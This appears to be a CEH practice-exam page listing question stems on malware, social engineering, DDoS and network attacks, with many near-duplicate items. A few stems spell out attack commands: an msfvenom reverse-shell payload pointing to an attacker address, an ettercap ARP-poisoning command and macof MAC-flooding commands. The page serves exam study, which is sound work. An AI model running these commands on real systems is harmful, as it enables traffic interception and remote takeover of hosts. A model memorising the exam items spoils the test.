Practice CEH Malware, Social Engineering and Network Attacks questions with full explanations on every answer.
Start practicing
Malware, Social Engineering and Network Attacks — choose a session length
Free · No account required
Click any question to see the full explanation and answer options, or start a focused practice session above.
A security analyst notices a high volume of ICMP Echo Reply packets on the network. The source IPs are varied, but the destination IP is the same. Which type of attack is MOST likely occurring?
2A user receives a phone call from someone claiming to be from IT support, asking for their password to troubleshoot an issue. Which social engineering technique is being used?
3Which tool would a penetration tester MOST likely use to perform ARP poisoning and conduct a man-in-the-middle attack on a local network?
4An analyst observes the following output from Wireshark: a TCP packet with the SYN flag set, followed by a SYN-ACK, then an ACK, and then a RST. The sequence numbers show a pattern: initial seq=100, ack=300, then seq=300, ack=101. What is the MOST likely interpretation?
5A security team discovers a file named 'svchost.exe' in a user's Temp folder. The file is signed by 'Microsoft Corporation' but the digital signature validation fails. Which analysis method should be used FIRST to determine if it's malicious?
6An organization is experiencing repeated DDoS attacks that consume all available bandwidth. Which mitigation technique is MOST effective for handling such volumetric attacks?
7Which type of malware is characterized by self-replication and spreading across networks without needing a host file?
8A penetration tester uses the Social Engineering Toolkit (SET) to create a malicious USB drive that autoruns when inserted. Which social engineering technique is being employed?
9An IDS alerts on a large number of outbound DNS queries from an internal host to a suspicious domain. The queries have random subdomains and the response size is large. Which attack is MOST likely in progress?
10Which type of malware encrypts the victim's files and demands payment for the decryption key?
11A network administrator notices that the switch's CAM table is full, causing the switch to flood all incoming traffic out of all ports. Which attack is MOST likely occurring?
12During a penetration test, you capture the following output: 'HTTP/1.1 200 OK ... Set-Cookie: sessionid=abc123; path=/'. You then send a request with a modified cookie value 'sessionid=abc124' and receive a valid session. Which type of vulnerability has been exploited?
13Which TWO of the following are characteristics of a polymorphic virus? (Select 2)
14Which THREE of the following are effective DDoS mitigation techniques? (Select 3)
15Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)
16A security analyst receives an alert indicating that a host on the internal network is sending a high volume of ICMP echo requests to multiple external IP addresses. The analyst notices that the source IP address is spoofed. Which type of attack is MOST likely occurring?
17Which of the following tools is specifically designed for ARP poisoning and can be used to perform man-in-the-middle attacks on a local network?
18A system administrator notices unusual outbound traffic from a server on port 4444. The server has no legitimate service listening on that port. A malware analyst runs 'strings' on a suspicious binary and finds a reference to 'cmd.exe /c' and an IP address. What type of malware is MOST likely present?
19An organization wants to test its employees' susceptibility to social engineering by sending fake emails that appear to come from the IT department, requesting password resets. Which tool would be MOST effective for conducting this test?
20A security team observes that a switch's MAC address table is full, and the switch has started flooding unicast traffic to all ports. Which attack has MOST likely been performed?
21Which type of malware spreads by replicating itself across a network without requiring a host file to attach to?
22An analyst uses the following command to capture traffic: tcpdump -i eth0 -w capture.pcap host 10.0.0.5 and port 80. After generating traffic from a web server at 10.0.0.5, the analyst examines the pcap with Wireshark. What type of traffic will appear in the capture?
23A security analyst detects a file named 'invoice.pdf.exe' in an email attachment. When the file is submitted to VirusTotal, multiple engines detect it as a Trojan. The analyst wants to perform dynamic analysis to observe its behavior. Which approach is BEST?
24Which type of social engineering attack involves a malicious actor impersonating a legitimate organization in a voicemail message to trick the victim into revealing sensitive information?
25A penetration tester is performing a session hijacking attack. After capturing packets, the tester successfully predicts the TCP sequence numbers and injects packets to take over the session. Which type of attack is this?
26A security engineer is configuring DDoS protection for a web server. The goal is to mitigate a Slowloris attack. Which mitigation technique is MOST effective?
27An employee receives an email that appears to be from the CEO, requesting an urgent wire transfer. The email address is slightly misspelled (e.g., ceo@cornpany.com instead of ceo@company.com). This is an example of which type of attack?
28Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)
29Which THREE of the following are techniques used in static malware analysis? (Select 3)
30Which TWO of the following are common indicators of a DNS spoofing attack? (Select 2)
31A security analyst discovers a user downloaded a file that, when executed, creates a hidden process that connects to a remote server and allows full remote control of the system. Which type of malware BEST describes this behavior?
32A penetration tester receives an email that appears to be from the company's CEO, urgently requesting that the tester click a link to review a document. The email contains several grammatical errors and the sender's address is slightly misspelled. Which type of social engineering attack is this MOST likely?
33An organization's security team observes a surge in outgoing DNS queries to external servers from a single internal host, with each query returning unusually large responses (e.g., 4000 bytes). The host is not configured as a DNS resolver. Which attack is MOST likely occurring?
34A security analyst is investigating a suspicious file and wants to quickly determine whether it is known malware without executing it. Which approach should the analyst use FIRST?
35A network administrator notices that the ARP cache on several workstations contains entries mapping the default gateway IP to an unknown MAC address. Users report intermittent connectivity issues. Which tool is MOST likely being used to perform this attack?
36Which of the following malware types is characterized by self-replication without requiring a host file or program, and spreading across networks automatically?
37During a penetration test, you execute a command that sends a large number of spoofed ICMP echo request packets to a subnet's broadcast address. This results in a flood of replies to the target system. Which attack have you performed?
38A security analyst notices that a web server is experiencing slow response times, and the connection logs show many incomplete HTTP requests from various IP addresses, each keeping connections open for long periods. Which attack is MOST likely occurring?
39A company's security team wants to deploy a DDoS mitigation technique that distributes incoming traffic across multiple servers in different geographic locations, making it harder for an attacker to overwhelm a single target. Which technique BEST fits this description?
40Which of the following is a tool commonly used for MAC flooding attacks to force a switch into fail-open mode, allowing sniffing of all traffic on the network?
41A penetration tester uses the following command to scan a target: nmap -sU -sV -p 53,161,162 10.0.0.1. Which of the following BEST describes what this scan will accomplish?
42An attacker calls a company's help desk, pretending to be a new employee who forgot his username and password. The attacker provides some employee details gleaned from social media and convinces the help desk to reset the password. Which social engineering technique is being used?
43Which TWO types of malware typically require user interaction (e.g., opening a file or clicking a link) to activate? (Select two.)
44Which THREE of the following are characteristics of a DNS amplification DDoS attack? (Select three.)
45Which TWO of the following are examples of static malware analysis techniques? (Select two.)
46A security analyst notices repeated failed login attempts from a single external IP address targeting the company's webmail portal. The attempts use common usernames like 'admin', 'user', and 'test'. Which type of social engineering attack is MOST likely being attempted?
47During a penetration test, a security analyst runs the following command on a Linux system: ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//. What is the PRIMARY purpose of this command?
48An incident response team discovers a suspicious executable on a compromised workstation. They want to analyze the malware without executing it. Which of the following techniques would be MOST appropriate for this initial analysis?
49A security analyst observes a sudden surge in incoming UDP traffic to the company's DNS servers from multiple external IP addresses. The packets appear to be DNS queries with spoofed source IPs. Which type of DDoS attack is MOST likely occurring?
50Which of the following is a type of malware that spreads by replicating itself across a network without requiring a host file?
51A penetration tester uses a tool to perform ARP poisoning and then launches a man-in-the-middle attack. The tool also allows session hijacking and sniffing. Which of the following tools is being used?
52An employee receives an email that appears to be from the company's CEO, requesting an urgent wire transfer to a vendor. The email address is slightly different from the CEO's actual address. Which type of social engineering attack is this?
53A security analyst is analyzing a suspicious file and runs the command 'strings malware.exe | grep -i http'. The output shows several URLs ending with '.exe'. What does this indicate?
54Which of the following tools is specifically designed to perform MAC flooding to force a switch into fail-open mode, allowing packet sniffing?
55A user reports that their computer is infected with ransomware. Which of the following is the BEST immediate action for the security team to take?
56Which type of malware is characterized by modifying its own code to evade signature-based detection, often changing its appearance each time it replicates?
57A network administrator notices an unusual amount of traffic on port 389 from an internal server to multiple external IP addresses. Which type of malware might be present?
58Which TWO of the following are characteristics of a DNS amplification attack? (Select 2)
59Which THREE of the following are examples of application-layer DDoS attacks? (Select 3)
60Which TWO of the following are valid techniques for session hijacking? (Select 2)
61A security analyst discovers a file named invoice.exe in an email attachment. Static analysis with PEiD indicates the file is packed with UPX. What is the BEST next step in analyzing this malware?
62A network administrator notices an unusually high number of half-open TCP connections to the company's web server. The source IPs are spoofed. Which type of attack is MOST likely occurring?
63During a penetration test, an analyst uses a tool that sends forged ARP replies to associate the attacker's MAC address with the IP address of the default gateway. This technique allows the attacker to intercept traffic. Which tool is commonly used for this purpose?
64A security analyst receives an alert about a workstation repeatedly sending large volumes of ICMP echo request packets to a broadcast address. Which type of attack is this indicative of?
65A user receives a phone call from someone claiming to be from IT support, asking for their password to perform a system update. This is an example of which social engineering technique?
66A forensic analyst examines a system infected with malware that displays ransomware notes and encrypts files. The analyst uses a sandbox to observe behavior. During analysis, the malware contacts a C2 server and downloads additional payloads. Which type of malware analysis is being performed?
67Which type of malware is designed to replicate itself across networks without requiring a host file, often exploiting vulnerabilities to spread?
68An organization wants to protect against DNS spoofing attacks. Which security measure is MOST effective in preventing an attacker from poisoning DNS cache entries?
69A security team suspects a session hijacking attack. The analyst examines network traffic and sees packets with sequence numbers that increment by predictable values. Which attack is MOST likely occurring?
70Which tool is specifically designed to create and manage phishing campaigns for security awareness testing?
71A network switch starts behaving like a hub, broadcasting all traffic to all ports. The security team suspects an attack that floods the switch with fake MAC addresses. Which attack is this?
72Which DoS attack exploits the HTTP protocol by sending partial HTTP requests to keep connections open, exhausting server resources?
73Which TWO of the following are characteristics of a polymorphic virus? (Select 2)
74Which THREE of the following are effective DDoS mitigation techniques? (Select 3)
75Which TWO of the following are types of malware analysis? (Select 2)
76A security analyst observes repeated failed login attempts from a single IP address targeting multiple user accounts. Which type of social engineering attack is being attempted?
77A security analyst runs the command 'tcpdump -i eth0 -n host 10.0.0.5 and port 80' and sees many packets with the SYN flag set but no corresponding ACK. Which attack is likely occurring?
78During a penetration test, you discover a process named 'svch0st.exe' running on a Windows server with high CPU usage. The file is not digitally signed. Which type of malware is MOST likely present?
79An attacker sends an email that appears to come from the CEO, requesting that the recipient urgently transfer funds to a specified account. Which type of social engineering attack is this?
80A security analyst executes the command 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe' and transfers the file to a target. Which technique is being used?
81After a security incident, an analyst retrieves a suspicious file. The analyst runs the 'strings' command on it and sees references to 'CreateRemoteThread' and 'WriteProcessMemory'. Which technique does this indicate?
82An organization experiences a DDoS attack where a large volume of DNS queries with spoofed source IPs are sent to open DNS resolvers, which then amplify the traffic to the victim. Which type of attack is this?
83During a penetration test, you run the command: 'macof -i eth0 -s 192.168.1.1 -d 192.168.2.1 -e 00:11:22:33:44:55'. What is the intended effect of this command?
84An analyst is analyzing a suspicious file using VirusTotal and observes that only 3 out of 60 antivirus engines detect it as malicious. The file has been submitted before but with no detections. What should the analyst conclude?
85A security analyst notices that the ARP cache on a workstation contains multiple entries for the same IP address with different MAC addresses. Which attack is likely occurring?
86An attacker wants to perform a man-in-the-middle attack on a local network. Which two tools from the following list would be most effective? (Select the best answer from the options below; note: this is a multiple choice, not multi-select) A) Wireshark B) Ettercap C) Nmap D) Metasploit E) Aircrack-ng
87Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?
88Which TWO of the following are effective mitigation techniques against DDoS attacks? (Select two)
89Which THREE of the following are indicators that a system may be infected with a backdoor Trojan? (Select three)
90Which TWO of the following are examples of social engineering attacks? (Select two)
91A security analyst notices an unusual spike in outbound traffic on UDP port 53 from a single internal host. The host is not a DNS server. Which type of malware is MOST likely responsible?
92Which tool would an ethical hacker use to automatically generate a malicious USB drive that, when plugged in, executes a payload and connects back to the attacker?
93During a penetration test, a security analyst captures network traffic and observes a series of ARP replies without corresponding ARP requests. An internal host's IP address is suddenly associated with two different MAC addresses. Which attack is MOST likely occurring?
94A penetration tester wants to perform a stealth scan without completing the TCP three-way handshake. The target is a web server on port 80. The tester uses Nmap with the -sS flag. What is the expected behavior if the port is open?
95Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?
96A security analyst reviews logs and notices that an attacker crafted a packet with a source IP address matching the target's IP address, and sent it to a network's broadcast address. Which type of attack does this describe?
97Which of the following is a characteristic of a polymorphic virus?
98An organization experiences a DDoS attack where the attacker sends many incomplete HTTP requests that keep connections open, exhausting the server's connection pool. Which attack technique is being used?
99During a social engineering engagement, an attacker calls an employee pretending to be from IT support and asks for their password to perform a system update. Which social engineering technique is being employed?
100Which type of malware is characterized by its ability to spread without requiring a host file and can replicate across networks automatically?
101A company wants to defend against DNS amplification attacks. Which mitigation technique would be MOST effective?
102An ethical hacker is analyzing a suspicious file using static analysis. Which of the following actions is part of static malware analysis?
103Which TWO of the following are examples of application-layer DDoS attacks? (Choose two.)
104Which THREE of the following are common indicators of a man-in-the-middle attack using ARP spoofing? (Choose three.)
105Which TWO of the following are techniques used in session hijacking attacks? (Choose two.)
106A security analyst observes a gradual increase in network traffic from an internal host to an external IP address on port 443, with the host also connecting to a known command-and-control (C2) domain. Which type of malware is MOST likely responsible?
107Which of the following tools is commonly used for dynamic malware analysis by executing the malware in an isolated environment and monitoring system changes?
108An organization receives an email that appears to be from the CEO, urgently requesting that the recipient wire funds to a new vendor. The email contains the CEO's name and title but the sender address is slightly misspelled. Which type of social engineering attack is this?
109A security analyst detects an ongoing DDoS attack where the attacker sends a large number of ICMP echo request packets with spoofed source IP addresses to a network's broadcast address. The attack overwhelms the target with responses from all hosts on the network. Which attack type is this?
110Which tool can be used to perform ARP poisoning to intercept traffic between a victim and the default gateway?
111A user reports that their system has become very slow and numerous pop-up ads appear even when browsing is not active. Which type of malware is MOST likely installed?
112An analyst captures network traffic and sees a large number of packets with source IP 10.0.0.1, destination IP 192.168.1.1, TCP SYN flag set, with sequence numbers that appear incremental. The destination responds with SYN-ACK but the source never completes the handshake. Which attack is MOST likely occurring?
113Which of the following is a form of social engineering where an attacker physically follows an authorized person into a restricted area without proper authentication?
114An attacker uses the Social Engineering Toolkit (SET) to clone a legitimate website and send a malicious link to employees. When an employee clicks the link, they are prompted to enter their credentials. Which attack is this?
115A penetration tester runs the following command: `macof -i eth0 -s 192.168.1.100 -d 10.0.0.1`. Which attack is being performed?
116Which type of malware is characterized by being able to change its code signature each time it replicates to evade signature-based detection?
117An organization wants to mitigate the impact of a DDoS attack by distributing incoming traffic across multiple servers in different geographic locations. Which technique is BEST suited?
118Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)
119Which THREE of the following are static malware analysis techniques? (Select 3)
120Which TWO of the following are examples of session hijacking attacks? (Select 2)
121A security analyst receives an email that appears to be from the CEO, urgently requesting a wire transfer. The email address is slightly misspelled (ceo@cornpany.com instead of ceo@company.com). Which type of social engineering attack is this?
122During a penetration test, a tester uses a tool to perform ARP spoofing to intercept traffic between two hosts on the same subnet. Which tool is most commonly associated with this technique?
123A security analyst runs the following command: 'python macof -i eth0 -n 1000'. Shortly after, the switch begins flooding traffic to all ports. What is the analyst trying to achieve?
124A user reports that their system has become sluggish and they see pop-up advertisements even when no browser is open. Additionally, unknown processes are running in Task Manager. Which type of malware is most likely responsible?
125A security team detects a large number of UDP packets from multiple sources directed at a single server's DNS port (53). The packets appear to have a spoofed source IP of the target. Which type of DDoS attack is being observed?
126After a security incident, an analyst retrieves a suspicious file. To determine if it is malicious without executing it, the analyst runs the 'strings' command and uploads the file to VirusTotal. Which type of malware analysis is being performed?
127A penetration tester successfully predicts the TCP sequence numbers of a target and sends crafted packets to impersonate a trusted host. Which type of attack is this?
128Which of the following is a type of malware that replicates itself by attaching to executable files and requires human action to spread, such as opening an infected attachment?
129A security analyst notices that a web server is responding very slowly to legitimate requests. The server logs show many incomplete HTTP GET requests that never complete, each opened slowly over time from many different IP addresses. Which attack is most likely occurring?
130An attacker gains physical access to a building by following an authorized employee through a secure door without using a badge. Which social engineering technique is being used?
131Which tool is commonly used to perform DNS spoofing on a local network by intercepting DNS requests and replying with forged responses?
132A system administrator receives a phone call from someone claiming to be from IT support, asking for the administrator's password to 'fix a server issue'. This is an example of which social engineering attack?
133Which TWO of the following are characteristics of a polymorphic virus?
134Which THREE of the following are effective DDoS mitigation techniques?
135Which TWO of the following are examples of application-layer DDoS attacks?
136A security analyst notices that an internal server is sending a high volume of DNS queries to external servers for non-existent domains. Which type of malware behavior is MOST likely being observed?
137During a social engineering assessment, an attacker calls a help desk impersonating a new employee and requests a password reset due to a 'locked account'. The help desk complies. Which social engineering technique is being used?
138A security analyst runs 'strings malware.exe' and finds several URLs and IP addresses. The analyst then uploads the file to VirusTotal and gets a detection ratio of 5/70. What type of analysis has been performed?
139An analyst observes that a web server is receiving many HTTP GET requests with random parameter values, each request taking a long time to complete. The server's connection pool is exhausted, and legitimate users cannot access the site. Which attack is MOST likely occurring?
140Which tool is specifically designed to automate social engineering attacks, such as phishing and credential harvesting?
141A network administrator receives an alert that the switch's CAM table is full, causing the switch to flood frames out all ports. Which attack has likely occurred?
142A security analyst captures network traffic and sees a sequence of ARP replies with the same IP address mapping to different MAC addresses within a short period. Which attack is indicated?
143An attacker sends an email to the CEO of a company, pretending to be a board member and requesting a wire transfer for a confidential acquisition. Which social engineering attack is this?
144A security analyst uses a tool to capture packets in promiscuous mode on a network segment. The analyst notices that only traffic to and from the analyst's machine is captured, not all traffic on the segment. What is the most likely reason?
145Which of the following is the BEST defense against a TCP SYN flood attack?
146A penetration tester uses a tool to spoof ARP replies, redirecting traffic through the tester's machine. The tester then captures credentials from the redirected traffic. Which tool is BEST suited for this task?
147An employee receives an SMS message that claims to be from the IT department, asking the employee to click a link to verify their email account. Which social engineering attack is this?
148Which TWO of the following are characteristics of a polymorphic virus? (Choose two.)
149Which TWO of the following are examples of protocol-based DoS attacks? (Choose two.)
150Which THREE of the following are effective techniques to prevent ARP poisoning attacks? (Choose three.)
151A security analyst notices a significant increase in outbound traffic from an internal server to multiple external IPs on port 443. The server is not a web server and should not be initiating such connections. Which type of malware is MOST likely causing this behavior?
152Which tool is commonly used for ARP spoofing attacks to perform man-in-the-middle (MITM) attacks on a local network?
153An attacker uses the Social Engineering Toolkit (SET) to craft a phishing email that appears to come from the company's CEO, requesting the recipient to urgently wire funds to a new vendor. This attack is BEST described as which type of social engineering?
154During a penetration test, a tester captures network traffic and notices a large number of ARP replies claiming that 192.168.1.1 is at MAC address 00:11:22:33:44:55, which is different from the legitimate gateway MAC. Which attack is likely in progress?
155A security administrator notices that the network switch is broadcasting traffic to all ports as if it were a hub. The switch logs show a sudden flood of packets with random MAC addresses. Which attack is MOST likely occurring?
156A malware analyst wants to examine a suspicious executable without executing it. The goal is to extract strings, view the PE header, and check for known signatures. Which approach is the analyst using?
157An organization experiences a DDoS attack where the attacker sends a flood of UDP packets to a server, causing it to become unresponsive. The packets appear to come from many different source IP addresses and are directed to random high-numbered ports. Which type of DDoS attack is this?
158A SOC analyst observes a high number of incomplete TCP connections with the SYN flag set but no corresponding ACK from the target. The source IPs are spoofed and the connections are targeting port 80 on a web server. Which DDoS mitigation technique would be MOST effective in this scenario?
159Which type of malware is characterized by encrypting a victim's files and demanding a ransom payment for the decryption key?
160A penetration tester uses a tool to perform a man-in-the-middle attack by sending forged DNS responses that redirect users to a malicious website. Which tool is MOST likely being used to perform DNS spoofing?
161During a forensic investigation, an analyst finds a suspicious file that changes its code signature each time it replicates. The file uses encryption and polymorphism to evade signature-based detection. Which type of virus is this?
162An employee receives a text message claiming to be from the company's IT department, stating that their account will be suspended unless they click a link to verify their credentials. Which type of social engineering attack is this?
163Which TWO of the following are characteristics of a SYN flood attack? (Select 2)
164Which THREE of the following are common methods used to mitigate DDoS attacks? (Select 3)
165Which TWO of the following are examples of application layer (Layer 7) DDoS attacks? (Select 2)
166A security analyst receives an email from what appears to be the company's CEO requesting an urgent wire transfer. The email address is slightly misspelled (e.g., ce0@company.com instead of ceo@company.com). Which type of social engineering attack is this?
167A security analyst notices that a server is sending an unusually high number of SYN packets to multiple external hosts, but the connections are never completed. The server is most likely involved in which type of attack?
168A penetration tester needs to perform ARP poisoning to intercept traffic between two hosts on the same subnet. Which tool would be the most appropriate choice for this task?
169During a ransomware incident response, a forensic analyst recovers a suspicious file that appears to be a PE executable. The analyst wants to quickly check if the file is known malware without executing it. Which of the following is the BEST first step?
170Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?
171A security team wants to mitigate a DNS amplification DDoS attack. Which of the following techniques would be MOST effective in preventing the attack from leveraging open DNS resolvers?
172During a penetration test, an attacker gains access to a system and wants to maintain persistent remote control. Which type of Trojan is specifically designed for this purpose?
173A security analyst observes the following in a packet capture: a single source IP sends a large number of ICMP echo request packets to the broadcast address of a subnet, with the source IP spoofed to be the target victim. Which type of attack is being executed?
174Which of the following is a characteristic of a polymorphic virus?
175An attacker uses the Social Engineering Toolkit (SET) to send a malicious email to employees of a company, claiming to be from IT support and urging them to click a link to reset their password. Which social engineering attack is being performed?
176An analyst runs the following command: `tcpdump -i eth0 src host 192.168.1.10 and dst port 80 -w http_traffic.pcap`. What is the primary purpose of this command?
177A company wants to protect its network from MAC flooding attacks. Which of the following countermeasures is MOST effective?
178Which TWO of the following are examples of application layer DDoS attacks? (Select two.)
179Which THREE of the following are techniques used in session hijacking? (Select three.)
180Which TWO of the following are types of malware analysis? (Select two.)
181A security analyst observes a sudden flood of ICMP echo request packets from multiple external IPs to a single internal server. The packets have varying sizes and spoofed source addresses. Which type of attack is MOST likely occurring?
182Which tool is specifically designed to create fake login pages for phishing campaigns and can be integrated with Metasploit?
183During a forensic investigation, an analyst retrieves a suspicious executable. Running 'strings' reveals no readable text, and VirusTotal shows zero detections. However, when executed in a sandbox, the binary connects to a remote IP and injects code into 'explorer.exe'. Which conclusion is MOST accurate?
184A security analyst notices that users receive emails from a known vendor requesting urgent payment to a new bank account. The email domain is misspelled (e.g., vvendorfake.com). Which type of social engineering is this?
185Which malware type is characterized by self-replication across networks without needing a host file?
186An attacker gains physical access to a restricted area by following an authorized employee through a secured door without swiping a badge. This technique is known as:
187A security team detects that an internal host is sending ARP replies claiming to have the IP address of the default gateway. Which tool is MOST likely being used to perform this attack?
188Which DDoS attack type exploits a small query to a vulnerable service that generates a large response directed at the victim?
189A user receives a text message claiming their bank account is locked and requiring them to click a link to verify. This social engineering method is called:
190Which malware analysis approach involves running the suspicious file in a controlled environment to observe its behavior?
191A penetration tester uses a tool to perform a MAC flooding attack. What is the intended result of this attack?
192Which tool would an analyst use to capture packets from a network interface and later analyze the pcap file for signs of an attack?
193Which TWO of the following are characteristics of a polymorphic virus? (Choose 2)
194Which THREE of the following are effective DDoS mitigation techniques? (Choose 3)
195Which TWO of the following are techniques used in session hijacking? (Choose 2)
196A security analyst notices repeated TCP SYN packets sent to a server without corresponding SYN-ACK replies. The source IP addresses are spoofed and appear to be random. Which type of attack is MOST likely occurring?
197A user receives an email claiming to be from their bank, asking them to click a link and verify their account credentials. The email contains spelling errors and the link points to a suspicious domain. What type of social engineering attack is this?
198During a penetration test, a tester discovers that the target switch's MAC address table is full, causing it to flood traffic out all ports. The tester then captures network traffic using Wireshark on the same segment. Which attack was the tester performing?
199An organization wants to mitigate the impact of a DDoS attack that uses large volumes of UDP traffic to exhaust bandwidth. Which of the following techniques would be MOST effective?
200A security analyst receives an alert indicating that a workstation is sending outbound connections to a known malicious IP address. The analyst suspects a Trojan. Which tool is BEST for performing dynamic analysis of the suspicious binary?
201An attacker intercepts a TCP session between a client and a server. By analyzing sequence numbers, the attacker successfully predicts the next sequence number and injects malicious packets. Which attack is being performed?
202Which TWO of the following are characteristics of a polymorphic virus?
203Which TWO tools are commonly used for ARP poisoning attacks?
204Which THREE of the following are indicators of a slowloris DDoS attack?
205Which TWO of the following are types of malware that specifically aim to demand payment from victims?
206Which TWO of the following are examples of amplification attacks used in DDoS?
207Which THREE of the following are techniques used in session hijacking?
208Which TWO of the following are types of social engineering attacks that rely on impersonation?
209Which THREE of the following are valid methods for DDoS mitigation?
210Which TWO of the following are features of a Remote Access Trojan (RAT)?
211A security analyst reviews a sandbox report for a suspicious executable. The report shows that the executable modified the Windows registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to add a new entry pointing to itself. This action is characteristic of which type of malware?
212During a penetration test, you run the tool 'macof' against a switch. After a few seconds, the switch starts flooding frames out all ports. Which attack have you successfully executed, and what is the primary goal of this technique?
213An attacker sends an email that appears to come from the CEO of the company, requesting an urgent wire transfer to a specific account. This is an example of which social engineering attack?
214A network administrator notices unusual traffic patterns: the internal DNS server is receiving large DNS queries with the source IP spoofed to appear as the internal DNS server itself. The queries appear to be amplification requests. Which TWO characteristics describe this attack?
215During a forensic investigation, you find a file named 'svch0st.exe' in the startup folder. The file has a suspicious icon and was downloaded from an untrusted source. Analysis shows it opens a backdoor on port 4444 and sends system information to a remote server. Which THREE best describe this malware and its characteristics?
216A security analyst observes a sudden increase in network traffic from many external IPs targeting the company's web server with multiple HTTP GET requests to the same page (/index.php?page=home). The requests appear legitimate but are coming at a very high rate. Which TWO types of attack is the analyst most likely witnessing?
The Malware, Social Engineering and Network Attacks domain covers the key concepts tested in this area of the CEH exam blueprint published by EC-Council. Courseiva provides free domain-focused practice, mock exams, missed-question review, and readiness tracking across all CEH domains — no account required.
The Courseiva CEH question bank contains 216 questions in the Malware, Social Engineering and Network Attacks domain. Click any question to see the full explanation and answer breakdown.
Start with a 10-question focused session to identify your baseline accuracy in this domain. Read every explanation — even for questions you answer correctly — to understand the reasoning. Once you score consistently above 80%, move to a 20–30 question session to confirm depth before moving to the next domain.
Yes — the session launcher on this page draws questions exclusively from the Malware, Social Engineering and Network Attacks domain. Choose 10, 20, 30, or 50 questions for a focused session, or click individual questions to review them one by one.
Save your results, see per-domain analytics, and get readiness scores — free, for every certification.
Sign Up FreeFree forever · Every certification included